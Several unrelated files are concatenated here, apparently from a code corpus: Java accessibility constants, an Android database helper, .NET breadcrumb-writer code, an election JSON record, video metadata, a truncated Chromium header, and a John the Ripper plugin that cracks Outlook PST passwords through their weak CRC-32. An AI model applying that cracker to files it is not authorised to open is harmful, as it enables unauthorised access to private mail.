* * @see #PUSH_BUTTON * @see #TOGGLE_BUTTON * @see #RADIO_BUTTON */ public static final AccessibleRole CHECK_BOX = new AccessibleRole("checkbox"); /** * A specialized check box that will cause other radio buttons in the same * group to become unchecked when this one is checked. * * @see #PUSH_BUTTON * @see #TOGGLE_BUTTON * @see #CHECK_BOX */ public static final AccessibleRole RADIO_BUTTON = new AccessibleRole("radiobutton"); /** * The header for a row of data. */ public static final AccessibleRole ROW_HEADER = new AccessibleRole("rowheader"); /** * An object that allows a user to incrementally view a large amount of * information. Its children can include scroll bars and a viewport. * * @see #SCROLL_BAR * @see #VIEWPORT */ public static final AccessibleRole SCROLL_PANE = new AccessibleRole("scrollpane"); /** * An object usually used to allow a user to incrementally view a large * amount of data. Usually used only by a scroll pane. * * @see #SCROLL_PANE */ public static final AccessibleRole SCROLL_BAR = new AccessibleRole("scrollbar"); /** * An object usually used in a scroll pane. It represents the portion of the * entire data that the user can see. As the user manipulates the scroll * bars, the contents of the viewport can change. * * @see #SCROLL_PANE */ public static final AccessibleRole VIEWPORT = new AccessibleRole("viewport"); /** * An object that allows the user to select from a bounded range. For * example, a slider might be used to select a number between 0 and 100. */ public static final AccessibleRole SLIDER = new AccessibleRole("slider"); /** * A specialized panel that presents two other panels at the same time. * Between the two panels is a divider the user can manipulate to make one * panel larger and the other panel smaller. */ public static final AccessibleRole SPLIT_PANE = new AccessibleRole("splitpane"); /** * An object used to present information in terms of rows and columns. An * example might include a spreadsheet application. 
*/ public static final AccessibleRole TABLE = new AccessibleRole("table"); /** * An object that presents text to the user. The text is usually editable by * the user as opposed to a label. * * @see #LABEL */ public static final AccessibleRole TEXT = new AccessibleRole("text"); /** * An object used to present hierarchical information to the user. The * individual nodes in the tree can be collapsed and expanded to provide * selective disclosure of the tree's contents. */ public static final AccessibleRole TREE = new AccessibleRole("tree"); /** * A bar or palette usually composed of push buttons or toggle buttons. It * is often used to provide the most frequently used functions for an * application. */ public static final AccessibleRole TOOL_BAR = new AccessibleRole("toolbar"); /** * An object that provides information about another object. The * {@code accessibleDescription} property of the tool tip is often displayed * to the user in a small "help bubble" when the user causes the mouse to * hover over the object associated with the tool tip. */ public static final AccessibleRole TOOL_TIP = new AccessibleRole("tooltip"); /** * An AWT component, but nothing else is known about it. * * @see #SWING_COMPONENT * @see #UNKNOWN */ public static final AccessibleRole AWT_COMPONENT = new AccessibleRole("awtcomponent"); /** * A Swing component, but nothing else is known about it. * * @see #AWT_COMPONENT * @see #UNKNOWN */ public static final AccessibleRole SWING_COMPONENT = new AccessibleRole("swingcomponent"); /** * The object contains some {@code Accessible} information, but its role is * not known. * * @see #AWT_COMPONENT * @see #SWING_COMPONENT */ public static final AccessibleRole UNKNOWN = new AccessibleRole("unknown"); /** * A {@code STATUS_BAR} is an simple component that can contain multiple * labels of status information to the user. 
*/ public static final AccessibleRole STATUS_BAR = new AccessibleRole("statusbar"); /** * A {@code DATE_EDITOR} is a component that allows users to edit * {@code java.util.Date} and {@code java.util.Time} objects. */ public static final AccessibleRole DATE_EDITOR = new AccessibleRole("dateeditor"); /** * A {@code SPIN_BOX} is a simple spinner component and its main use is for * simple numbers. */ public static final AccessibleRole SPIN_BOX = new AccessibleRole("spinbox"); /** * A {@code FONT_CHOOSER} is a component that lets the user pick various * attributes for fonts. */ public static final AccessibleRole FONT_CHOOSER = new AccessibleRole("fontchooser"); /** * A {@code GROUP_BOX} is a simple container that contains a border around * it and contains components inside it. */ public static final AccessibleRole GROUP_BOX = new AccessibleRole("groupbox"); /** * A text header. * * @since 1.5 */ public static final AccessibleRole HEADER = new AccessibleRole("header"); /** * A text footer. * * @since 1.5 */ public static final AccessibleRole FOOTER = new AccessibleRole("footer"); /** * A text paragraph. * * @since 1.5 */ public static final AccessibleRole PARAGRAPH = new AccessibleRole("paragraph"); /** * A ruler is an object used to measure distance. * * @since 1.5 */ public static final AccessibleRole RULER = new AccessibleRole("ruler"); /** * A role indicating the object acts as a formula for calculating a value. * An example is a formula in a spreadsheet cell. * * @since 1.5 */ public static final AccessibleRole EDITBAR = new AccessibleRole("editbar"); /** * A role indicating the object monitors the progress of some operation. * * @since 1.5 */ public static final AccessibleRole PROGRESS_MONITOR = new AccessibleRole("progressMonitor"); // The following are all under consideration for potential future use. 
// public static final AccessibleRole APPLICATION // = new AccessibleRole("application"); // public static final AccessibleRole BORDER // = new AccessibleRole("border"); // public static final AccessibleRole CHECK_BOX_MENU_ITEM // = new AccessibleRole("checkboxmenuitem"); // public static final AccessibleRole CHOICE // = new AccessibleRole("choice"); // public static final AccessibleRole COLUMN // = new AccessibleRole("column"); // public static final AccessibleRole CURSOR // = new AccessibleRole("cursor"); // public static final AccessibleRole DOCUMENT // = new AccessibleRole("document"); // public static final AccessibleRole IMAGE // = new AccessibleRole("Image"); // public static final AccessibleRole INDICATOR // = new AccessibleRole("indicator"); // public static final AccessibleRole RADIO_BUTTON_MENU_ITEM // = new AccessibleRole("radiobuttonmenuitem"); // public static final AccessibleRole ROW // = new AccessibleRole("row"); // public static final AccessibleRole TABLE_CELL // = new AccessibleRole("tablecell"); // public static final AccessibleRole TREE_NODE // = new AccessibleRole("treenode"); /** * Creates a new {@code AccessibleRole} using the given locale independent * key. This should not be a public method. Instead, it is used to create * the constants in this file to make it a strongly typed enumeration. * Subclasses of this class should enforce similar policy. * <p> * The key {@code String} should be a locale independent key for the role. * It is not intended to be used as the actual {@code String} to display to * the user. To get the localized string, use {@link #toDisplayString()}. * * @param key the locale independent name of the role * @see AccessibleBundle#toDisplayString */ protected AccessibleRole(String key) { this.key = key; } }
7,961
879
<gh_stars>100-1000 package com.cundong.izhihu.db; import android.content.Context; import android.database.sqlite.SQLiteDatabase; import android.database.sqlite.SQLiteOpenHelper; public final class DatabaseHelper extends SQLiteOpenHelper { //db public static final String DB_NAME = "news_paper.db"; public static final int DB_VERSION = 7; //1.news_list //store news list and news detail public static final String NEWS_TABLE_NAME = "news_list"; public static final String NEWS_COLUMN_ID = "_id"; public static final String NEWS_COLUMN_TYPE = "type"; public static final String NEWS_COLUMN_KEY = "key"; public static final String NEWS_COLUMN_CONTENT = "content"; private static final String NEWS_TABLE_CREATE = "CREATE TABLE " + NEWS_TABLE_NAME + "(" + NEWS_COLUMN_ID + " INTEGER PRIMARY KEY AUTOINCREMENT, " + NEWS_COLUMN_TYPE + " INTEGER NOT NULL, " + NEWS_COLUMN_KEY + " CHAR(256) UNIQUE NOT NULL, " + NEWS_COLUMN_CONTENT + " TEXT NOT NULL);"; //2.news_read public static final String READ_TABLE_NAME = "news_read"; public static final String READ_COLUMN_ID = "_id"; public static final String READ_COLUMN_NEWSID = "news_id"; private static final String READ_TABLE_CREATE = "CREATE TABLE " + READ_TABLE_NAME + "(" + READ_COLUMN_ID + " INTEGER PRIMARY KEY AUTOINCREMENT, " + READ_COLUMN_NEWSID + " CHAR(256) UNIQUE);"; //3.news_favorite public static final String FAVORITE_TABLE_NAME = "news_favorite"; public static final String FAVORITE_COLUMN_ID = "_id"; public static final String FAVORITE_COLUMN_NEWS_ID = "news_id"; public static final String FAVORITE_COLUMN_NEWS_TITLE = "news_title"; public static final String FAVORITE_COLUMN_NEWS_LOGO = "news_logo"; public static final String FAVORITE_COLUMN_NEWS_SHARE_URL = "news_share_url"; private static final String FAVORITE_TABLE_CREATE = "CREATE TABLE " + FAVORITE_TABLE_NAME + "(" + FAVORITE_COLUMN_ID + " INTEGER PRIMARY KEY AUTOINCREMENT, " + FAVORITE_COLUMN_NEWS_ID + " CHAR(256) UNIQUE, " + FAVORITE_COLUMN_NEWS_TITLE + " CHAR(1024), " + 
FAVORITE_COLUMN_NEWS_LOGO + " CHAR(1024), " + FAVORITE_COLUMN_NEWS_SHARE_URL + " CHAR(1024));"; private volatile static DatabaseHelper mDBHelper; private DatabaseHelper(Context context) { super(context, DB_NAME, null, DB_VERSION); } public static synchronized DatabaseHelper getInstance(Context context) { if (mDBHelper == null) { synchronized (DatabaseHelper.class) { if (mDBHelper == null) { mDBHelper = new DatabaseHelper(context); } } } return mDBHelper; } @Override public void onCreate(SQLiteDatabase db) { db.execSQL(NEWS_TABLE_CREATE); db.execSQL(READ_TABLE_CREATE); db.execSQL(FAVORITE_TABLE_CREATE); } @Override public void onUpgrade(SQLiteDatabase db, int oldVersion, int newVersion) { db.execSQL("DROP TABLE IF EXISTS " + NEWS_TABLE_NAME); db.execSQL("DROP TABLE IF EXISTS " + READ_TABLE_NAME); db.execSQL("DROP TABLE IF EXISTS " + FAVORITE_TABLE_NAME); onCreate(db); } }
1,128
9,402
// Licensed to the .NET Foundation under one or more agreements.
// The .NET Foundation licenses this file to you under the MIT license.

#include <thread>
#include <pal.h>
#include <utils.h>
#include <trace.h>
#include "breadcrumbs.h"

// Takes ownership of the caller's file set by swapping it into m_files
// (cheap move; leaves the caller's set empty), then resolves the on-disk
// breadcrumb store directory. If the store cannot be resolved,
// m_breadcrumb_store is cleared so begin_write() can detect the failure.
breadcrumb_writer_t::breadcrumb_writer_t(std::unordered_set<pal::string_t> &files)
{
    assert(m_files.empty());
    m_files.swap(files);
    assert(files.empty());
    if (!pal::get_default_breadcrumb_store(&m_breadcrumb_store))
    {
        m_breadcrumb_store.clear();
    }
}

// Begin breadcrumb writing: launch a thread to write breadcrumbs.
// Returns nullptr (and writes nothing) when the breadcrumb store path could
// not be resolved in the constructor. Otherwise spawns a background thread
// and returns the shared writer so the caller can later call end_write().
std::shared_ptr<breadcrumb_writer_t> breadcrumb_writer_t::begin_write(std::unordered_set<pal::string_t> &files)
{
    trace::verbose(_X("--- Begin breadcrumb write"));
    auto instance = std::make_shared<breadcrumb_writer_t>(files);
    if (instance->m_breadcrumb_store.empty())
    {
        trace::verbose(_X("Breadcrumb store was not obtained... skipping write."));
        return nullptr;
    }

    // Add a reference to this object for the thread we will spawn.
    // m_threads_instance is a shared_ptr back to *this: it keeps the writer
    // alive for the duration of the background write even if the caller drops
    // its own reference; write_callback() releases it when the work is done.
    instance->m_threads_instance = instance;
    instance->m_thread = std::thread(write_worker_callback, instance.get());
    trace::verbose(_X("Breadcrumbs will be written using a background thread"));
    return instance;
}

// Write the breadcrumbs. This method should be called
// only from the background thread.
// For each tracked file, "touches" an empty marker file named
// "netcore,<file>" inside the breadcrumb store; existing markers are left
// as-is. Failures only flip `successful` for the trace message — the write
// is best-effort by design.
void breadcrumb_writer_t::write_callback()
{
    bool successful = true;
    for (const auto& file : m_files)
    {
        pal::string_t file_path = m_breadcrumb_store;
        pal::string_t file_name = _X("netcore,") + file;
        append_path(&file_path, file_name.c_str());
        if (!pal::file_exists(file_path))
        {
            if (!pal::touch_file(file_path))
            {
                successful = false;
            }
        }
    }
    trace::verbose(_X("--- End breadcrumb write %d"), successful);

    // Clear reference to this object for the thread.
    // Dropping the self-reference; if the caller has also released its
    // shared_ptr, the writer is destroyed after this point.
    m_threads_instance.reset();
}

// ThreadProc for the background writer.
// Catch-all is deliberate: breadcrumb writing must never take down the host,
// so any exception is reduced to a warning (best-effort semantics).
void breadcrumb_writer_t::write_worker_callback(breadcrumb_writer_t* p_this)
{
    assert(p_this);
    assert(p_this->m_threads_instance);
    assert(p_this->m_threads_instance.get() == p_this);
    try
    {
        trace::verbose(_X("Breadcrumb thread write callback..."));
        p_this->write_callback();
    }
    catch (...)
    {
        trace::warning(_X("An unexpected exception was thrown while leaving breadcrumbs"));
    }
}

// Wait for completion of the background tasks, if any.
// Blocks until the writer thread exits; safe to call when begin_write()
// never started a thread (joinable() is then false).
void breadcrumb_writer_t::end_write()
{
    if (m_thread.joinable())
    {
        trace::verbose(_X("Waiting for breadcrumb thread to exit..."));

        // Block on the thread to exit.
        m_thread.join();
    }
    trace::verbose(_X("Done waiting for breadcrumb thread to exit..."));
}
1,105
2,109
/* PST cracker patch for JtR. Hacked together during July of 2012 by
 * <NAME> <<EMAIL> at <EMAIL>>
 *
 * Optimizations and shift to pkzip CRC32 code done by JimF
 *
 * This software is Copyright (c) 2012, <NAME> <dhiru.kholia at gmail.com>
 * and it is hereby released to the general public under the following terms:
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted.
 *
 * Uses code from crc32_fmt_plug.c written by JimF
 */

/* Standard John-the-Ripper plugin stanza: the same file is included three
 * ways — once to declare the format, once to register it, once to compile
 * the implementation. */
#if FMT_EXTERNS_H
extern struct fmt_main fmt_pst;
#elif FMT_REGISTERS_H
john_register_one(&fmt_pst);
#else

#include <string.h>

#include "arch.h"
#include "misc.h"
#include "common.h"
#include "formats.h"
#include "crc32.h"

#if !FAST_FORMATS_OMP
#undef _OPENMP
#endif

#ifdef _OPENMP
#include <omp.h>
#ifdef __MIC__
#ifndef OMP_SCALE
#define OMP_SCALE 1024
#endif
#else
#ifndef OMP_SCALE
#define OMP_SCALE 16384 // core i7 no HT
#endif
#endif
/* Multiplier applied to min/max keys per crypt when OpenMP is enabled. */
static int omp_t = 1;
#endif

#include "memdbg.h"

/* Format descriptor constants. A PST "hash" is just the 8 hex digits of a
 * custom CRC-32 over the password bytes, tagged with "$pst$". */
#define FORMAT_LABEL "PST"
#define FORMAT_NAME "custom CRC-32"
#define FORMAT_TAG "$pst$"
#define FORMAT_TAG_LEN (sizeof(FORMAT_TAG)-1)
#define ALGORITHM_NAME "32/" ARCH_BITS_STR
#define BENCHMARK_COMMENT ""
#define BENCHMARK_LENGTH -1
#define PLAINTEXT_LENGTH 8
#define BINARY_SIZE 4
#define SALT_SIZE 0
#define BINARY_ALIGN sizeof(uint32_t)
#define SALT_ALIGN 1
#define MIN_KEYS_PER_CRYPT 1
#define MAX_KEYS_PER_CRYPT 256

/* Known ciphertext/plaintext pairs used by JtR's self-test. Note that
 * CRC-32 collides easily, hence FMT_NOT_EXACT below. */
static struct fmt_tests tests[] = {
	{"$pst$a9290513", "openwall"}, /* "jfuck jw" works too ;) */
	{"$pst$50e099bc", "password"},
	{"$pst$00000000", ""},
	{"$pst$e3da3318", "xxx"},
	{"$pst$a655dd18", "XYz123"},
	{"$pst$29b14070", "thisisalongstring"},
	{"$pst$25b44615", "string with space"},
	{NULL}
};

/* Per-candidate buffers, allocated in init(): the candidate passwords and
 * their computed CRC values, indexed in parallel. */
static char (*saved_key)[PLAINTEXT_LENGTH + 1];
static uint32_t (*crypt_out);

/* Allocate key/result arrays; when OpenMP is active, scale the key count by
 * thread count * OMP_SCALE so each thread gets a decent batch. */
static void init(struct fmt_main *self)
{
#if defined (_OPENMP)
	omp_t = omp_get_max_threads();
	self->params.min_keys_per_crypt *= omp_t;
	omp_t *= OMP_SCALE;
	self->params.max_keys_per_crypt *= omp_t;
#endif
	saved_key = mem_calloc(self->params.max_keys_per_crypt, sizeof(*saved_key));
	crypt_out = mem_calloc(self->params.max_keys_per_crypt, sizeof(*crypt_out));
}

/* Release the buffers allocated in init(). */
static void done(void)
{
	MEM_FREE(crypt_out);
	MEM_FREE(saved_key);
}

/* Accept only "$pst$" followed by exactly 8 hex digits (BINARY_SIZE * 2). */
static int valid(char *ciphertext, struct fmt_main *self)
{
	char *p;
	int extra;
	if (strncmp(ciphertext, FORMAT_TAG, FORMAT_TAG_LEN))
		return 0;
	p = ciphertext + FORMAT_TAG_LEN;
	if (hexlenl(p, &extra) != BINARY_SIZE * 2 || extra)
		return 0;
	return 1;
}

/* Store a candidate password, truncated to PLAINTEXT_LENGTH. */
static void set_key(char *key, int index)
{
	strnzcpy(saved_key[index], key, PLAINTEXT_LENGTH+1);
}

/* Any of the computed CRCs equal to the target binary? */
static int cmp_all(void *binary, int count)
{
	uint32_t crc=*((uint32_t*)binary), i;
	for (i = 0; i < count; ++i)
		if (crc == crypt_out[i])
			return 1;
	return 0;
}

static int cmp_one(void *binary, int index)
{
	return *((uint32_t*)binary) == crypt_out[index];
}

/* CRC-32 match is as exact as this format gets (collisions expected, see
 * FMT_NOT_EXACT), so nothing further to verify here. */
static int cmp_exact(char *source, int index)
{
	return 1;
}

/* Compute the custom CRC-32 of every queued candidate; the loop is
 * embarrassingly parallel, hence the plain omp parallel for. */
static int crypt_all(int *pcount, struct db_salt *salt)
{
	const int count = *pcount;
	int i;
#ifdef _OPENMP
#pragma omp parallel for private(i)
#endif
	for (i = 0; i < count; ++i) {
		CRC32_t crc = 0;
		unsigned char *p = (unsigned char*)saved_key[i];
		while (*p)
			crc = jtr_crc32(crc, *p++);
		crypt_out[i] = crc;
	}
	return count;
}

/* Parse the 8 hex digits after the tag into a uint32_t.
 * The literal 5 below equals FORMAT_TAG_LEN (strlen("$pst$")); using the
 * macro would be more consistent but the value is identical. */
static void *get_binary(char *ciphertext)
{
	static uint32_t *out;
	if (!out)
		out = mem_alloc_tiny(sizeof(uint32_t), MEM_ALIGN_WORD);
	sscanf(&ciphertext[5], "%x", out);
	return out;
}

static char *get_key(int index)
{
	return saved_key[index];
}

/* Hash-table bucketing helpers over the computed CRC values. */
static int get_hash_0(int index) { return crypt_out[index] & PH_MASK_0; }
static int get_hash_1(int index) { return crypt_out[index] & PH_MASK_1; }
static int get_hash_2(int index) { return crypt_out[index] & PH_MASK_2; }
static int get_hash_3(int index) { return crypt_out[index] & PH_MASK_3; }
static int get_hash_4(int index) { return crypt_out[index] & PH_MASK_4; }
static int get_hash_5(int index) { return crypt_out[index] & PH_MASK_5; }
static int get_hash_6(int index) { return crypt_out[index] & PH_MASK_6; }

/* Format registration record: params block first, then methods block.
 * Field order is fixed by struct fmt_main — do not reorder. */
struct fmt_main fmt_pst = {
	{
		FORMAT_LABEL,
		FORMAT_NAME,
		ALGORITHM_NAME,
		BENCHMARK_COMMENT,
		BENCHMARK_LENGTH,
		0,
		PLAINTEXT_LENGTH,
		BINARY_SIZE,
		BINARY_ALIGN,
		SALT_SIZE,
		SALT_ALIGN,
		MIN_KEYS_PER_CRYPT,
		MAX_KEYS_PER_CRYPT,
#ifdef _OPENMP
		FMT_OMP | FMT_OMP_BAD |
#endif
		FMT_CASE | FMT_TRUNC | FMT_8_BIT | FMT_NOT_EXACT,
		{ NULL },
		{ FORMAT_TAG },
		tests
	}, {
		init,
		done,
		fmt_default_reset,
		fmt_default_prepare,
		valid,
		fmt_default_split,
		get_binary,
		fmt_default_salt,
		{ NULL },
		fmt_default_source,
		{
			fmt_default_binary_hash_0,
			fmt_default_binary_hash_1,
			fmt_default_binary_hash_2,
			fmt_default_binary_hash_3,
			fmt_default_binary_hash_4,
			fmt_default_binary_hash_5,
			fmt_default_binary_hash_6
		},
		fmt_default_salt_hash,
		NULL,
		fmt_default_set_salt,
		set_key,
		get_key,
		fmt_default_clear_keys,
		crypt_all,
		{
			get_hash_0,
			get_hash_1,
			get_hash_2,
			get_hash_3,
			get_hash_4,
			get_hash_5,
			get_hash_6
		},
		cmp_all,
		cmp_one,
		cmp_exact
	}
};

#endif /* plugin stanza */
2,419
348
{"nom":"Saint-Laurent-de-Carnols","circ":"4ème circonscription","dpt":"Gard","inscrits":392,"abs":224,"votants":168,"blancs":20,"nuls":2,"exp":146,"res":[{"nuance":"REM","nom":"Mme <NAME>","voix":84},{"nuance":"FN","nom":"<NAME>","voix":62}]}
98
435
<reponame>amaajemyfren/data<filename>pycon-ar-2011/videos/pyconar-2011-alan-runyan-plone-pyar.json { "description": "<NAME> y su charla en el auditorio principal de PyConAr 2011 sobre el gestor de contenidos Plone. La conferencia tuvo lugar en la ciudad de Jun\u00edn ( Buenos Aires, Argentina ) en Septiembre de 2011, y fu\u00e9 organizada por PyAr ( Python Argentina ).", "language": "eng", "recorded": "2011-09-23", "speakers": [ "<NAME>" ], "thumbnail_url": "https://i.ytimg.com/vi/TNnU2oqPxUI/hqdefault.jpg", "title": "Plone", "videos": [ { "type": "youtube", "url": "https://www.youtube.com/watch?v=TNnU2oqPxUI" } ] }
280
777
/* * Copyright (C) 2011, 2012 Google Inc. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are * met: * * * Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * Redistributions in binary form must reproduce the above * copyright notice, this list of conditions and the following disclaimer * in the documentation and/or other materials provided with the * distribution. * * Neither the name of Google Inc. nor the names of its * contributors may be used to endorse or promote products derived from * this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
*/ #ifndef WebFrameClient_h #define WebFrameClient_h #include "../platform/WebColor.h" #include "WebAXObject.h" #include "WebDOMMessageEvent.h" #include "WebDataSource.h" #include "WebFileChooserParams.h" #include "WebFormElement.h" #include "WebFrame.h" #include "WebFrameOwnerProperties.h" #include "WebHistoryCommitType.h" #include "WebHistoryItem.h" #include "WebIconURL.h" #include "WebNavigationPolicy.h" #include "WebNavigationType.h" #include "WebNavigatorContentUtilsClient.h" #include "WebSandboxFlags.h" #include "WebTextDirection.h" #include "public/platform/BlameContext.h" #include "public/platform/WebCommon.h" #include "public/platform/WebEffectiveConnectionType.h" #include "public/platform/WebFeaturePolicy.h" #include "public/platform/WebFileSystem.h" #include "public/platform/WebFileSystemType.h" #include "public/platform/WebInsecureRequestPolicy.h" #include "public/platform/WebLoadingBehaviorFlag.h" #include "public/platform/WebPageVisibilityState.h" #include "public/platform/WebSecurityOrigin.h" #include "public/platform/WebSetSinkIdCallbacks.h" #include "public/platform/WebStorageQuotaCallbacks.h" #include "public/platform/WebStorageQuotaType.h" #include "public/platform/WebURLError.h" #include "public/platform/WebURLRequest.h" #include "public/web/WebContentSecurityPolicy.h" #include <v8.h> namespace blink { enum class WebTreeScopeType; class InterfaceProvider; class InterfaceRegistry; class WebApplicationCacheHost; class WebApplicationCacheHostClient; class WebColorChooser; class WebColorChooserClient; class WebContentDecryptionModule; class WebCookieJar; class WebDataSource; class WebEncryptedMediaClient; class WebExternalPopupMenu; class WebExternalPopupMenuClient; class WebFileChooserCompletion; class WebInstalledAppClient; class WebLocalFrame; class WebMediaPlayer; class WebMediaPlayerClient; class WebMediaPlayerEncryptedMediaClient; class WebMediaPlayerSource; class WebMediaSession; class WebServiceWorkerProvider; class WebPlugin; class 
WebPresentationClient; class WebPushClient; class WebRTCPeerConnectionHandler; class WebScreenOrientationClient; class WebString; class WebURL; class WebURLResponse; class WebUserMediaClient; class WebWorkerContentSettingsClientProxy; struct WebColorSuggestion; struct WebConsoleMessage; struct WebContextMenuData; struct WebPluginParams; struct WebPopupMenuInfo; struct WebRect; struct WebURLError; class BLINK_EXPORT WebFrameClient { public: virtual ~WebFrameClient() {} // Factory methods ----------------------------------------------------- // May return null. virtual WebPlugin* createPlugin(WebLocalFrame*, const WebPluginParams&) { return 0; } // May return null. // WebContentDecryptionModule* may be null if one has not yet been set. virtual WebMediaPlayer* createMediaPlayer(const WebMediaPlayerSource&, WebMediaPlayerClient*, WebMediaPlayerEncryptedMediaClient*, WebContentDecryptionModule*, const WebString& sinkId) { return 0; } // May return null. virtual WebMediaSession* createMediaSession() { return 0; } // May return null. virtual WebApplicationCacheHost* createApplicationCacheHost( WebApplicationCacheHostClient*) { return 0; } // May return null. virtual WebServiceWorkerProvider* createServiceWorkerProvider() { return 0; } // May return null. virtual WebWorkerContentSettingsClientProxy* createWorkerContentSettingsClientProxy() { return 0; } // Create a new WebPopupMenu. In the "createExternalPopupMenu" form, the // client is responsible for rendering the contents of the popup menu. virtual WebExternalPopupMenu* createExternalPopupMenu( const WebPopupMenuInfo&, WebExternalPopupMenuClient*) { return 0; } // Services ------------------------------------------------------------ // A frame specific cookie jar. May return null, in which case // WebKitPlatformSupport::cookieJar() will be called to access cookies. virtual WebCookieJar* cookieJar() { return 0; } // Returns a blame context for attributing work belonging to this frame. 
virtual BlameContext* frameBlameContext() { return nullptr; } // General notifications ----------------------------------------------- // Indicates if creating a plugin without an associated renderer is supported. virtual bool canCreatePluginWithoutRenderer(const WebString& mimeType) { return false; } // Indicates that another page has accessed the DOM of the initial empty // document of a main frame. After this, it is no longer safe to show a // pending navigation's URL, because a URL spoof is possible. virtual void didAccessInitialDocument() {} // Request the creation of a new child frame. Embedders may return nullptr // to prevent the new child frame from being attached. Otherwise, embedders // should create a new WebLocalFrame, insert it into the frame tree, and // return the created frame. virtual WebLocalFrame* createChildFrame(WebLocalFrame* parent, WebTreeScopeType, const WebString& name, const WebString& uniqueName, WebSandboxFlags sandboxFlags, const WebFrameOwnerProperties&) { return nullptr; } // This frame has set its opener to another frame, or disowned the opener // if opener is null. See http://html.spec.whatwg.org/#dom-opener. virtual void didChangeOpener(WebFrame*) {} // Specifies the reason for the detachment. enum class DetachType { Remove, Swap }; // This frame has been detached. Embedders should release any resources // associated with this frame. If the DetachType is Remove, the frame should // also be removed from the frame tree; otherwise, if the DetachType is // Swap, the frame is being replaced in-place by WebFrame::swap(). virtual void frameDetached(WebLocalFrame*, DetachType); // This frame has become focused. virtual void frameFocused() {} // A provisional load is about to commit. virtual void willCommitProvisionalLoad(WebLocalFrame*) {} // This frame's name has changed. virtual void didChangeName(const WebString& name, const WebString& uniqueName) {} // This frame has set an insecure request policy. 
virtual void didEnforceInsecureRequestPolicy(WebInsecureRequestPolicy) {} // This frame has been updated to a unique origin, which should be // considered potentially trustworthy if // |isPotentiallyTrustworthyUniqueOrigin| is true. TODO(estark): // this method only exists to support dynamic sandboxing via a CSP // delivered in a <meta> tag. This is not supposed to be allowed per // the CSP spec and should be ripped out. https://crbug.com/594645 virtual void didUpdateToUniqueOrigin( bool isPotentiallyTrustworthyUniqueOrigin) {} // The sandbox flags have changed for a child frame of this frame. virtual void didChangeSandboxFlags(WebFrame* childFrame, WebSandboxFlags flags) {} // Called when a Feature-Policy HTTP header is encountered while loading the // frame's document. virtual void didSetFeaturePolicyHeader( const WebParsedFeaturePolicy& parsedHeader) {} // Called when a new Content Security Policy is added to the frame's // document. This can be triggered by handling of HTTP headers, handling // of <meta> element, or by inheriting CSP from the parent (in case of // about:blank). virtual void didAddContentSecurityPolicy(const WebString& headerValue, WebContentSecurityPolicyType, WebContentSecurityPolicySource) {} // Some frame owner properties have changed for a child frame of this frame. // Frame owner properties currently include: scrolling, marginwidth and // marginheight. virtual void didChangeFrameOwnerProperties(WebFrame* childFrame, const WebFrameOwnerProperties&) {} // Called when a watched CSS selector matches or stops matching. virtual void didMatchCSS( WebLocalFrame*, const WebVector<WebString>& newlyMatchingSelectors, const WebVector<WebString>& stoppedMatchingSelectors) {} // Called the first time this frame is the target of a user gesture. virtual void setHasReceivedUserGesture() {} // Console messages ---------------------------------------------------- // Whether or not we should report a detailed message for the given source. 
virtual bool shouldReportDetailedMessageForSource(const WebString& source) { return false; } // A new message was added to the console. virtual void didAddMessageToConsole(const WebConsoleMessage&, const WebString& sourceName, unsigned sourceLine, const WebString& stackTrace) {} // Load commands ------------------------------------------------------- // The client should handle the navigation externally. virtual void loadURLExternally(const WebURLRequest&, WebNavigationPolicy, const WebString& downloadName, bool shouldReplaceCurrentEntry) {} // The client should load an error page in the current frame. virtual void loadErrorPage(int reason) {} // Navigational queries ------------------------------------------------ // The client may choose to alter the navigation policy. Otherwise, // defaultPolicy should just be returned. struct NavigationPolicyInfo { WebDataSource::ExtraData* extraData; // Note: if browser side navigations are enabled, the client may modify // the urlRequest. However, should this happen, the client should change // the WebNavigationPolicy to WebNavigationPolicyIgnore, and the load // should stop in blink. In all other cases, the urlRequest should not // be modified. WebURLRequest& urlRequest; WebNavigationType navigationType; WebNavigationPolicy defaultPolicy; bool replacesCurrentHistoryItem; bool isHistoryNavigationInNewChildFrame; bool isClientRedirect; WebFormElement form; bool isCacheDisabled; NavigationPolicyInfo(WebURLRequest& urlRequest) : extraData(nullptr), urlRequest(urlRequest), navigationType(WebNavigationTypeOther), defaultPolicy(WebNavigationPolicyIgnore), replacesCurrentHistoryItem(false), isHistoryNavigationInNewChildFrame(false), isClientRedirect(false), isCacheDisabled(false) {} }; virtual WebNavigationPolicy decidePolicyForNavigation( const NavigationPolicyInfo& info) { return info.defaultPolicy; } // During a history navigation, we may choose to load new subframes from // history as well. 
This returns such a history item if appropriate. virtual WebHistoryItem historyItemForNewChildFrame() { return WebHistoryItem(); } // Navigational notifications ------------------------------------------ // These notifications bracket any loading that occurs in the WebFrame. virtual void didStartLoading(bool toDifferentDocument) {} virtual void didStopLoading() {} // Notification that some progress was made loading the current frame. // loadProgress is a value between 0 (nothing loaded) and 1.0 (frame fully // loaded). virtual void didChangeLoadProgress(double loadProgress) {} // A form submission has been requested, but the page's submit event handler // hasn't yet had a chance to run (and possibly alter/interrupt the submit.) virtual void willSendSubmitEvent(const WebFormElement&) {} // A form submission is about to occur. virtual void willSubmitForm(const WebFormElement&) {} // A datasource has been created for a new navigation. The given // datasource will become the provisional datasource for the frame. virtual void didCreateDataSource(WebLocalFrame*, WebDataSource*) {} // A new provisional load has been started. virtual void didStartProvisionalLoad(WebLocalFrame* localFrame) {} // 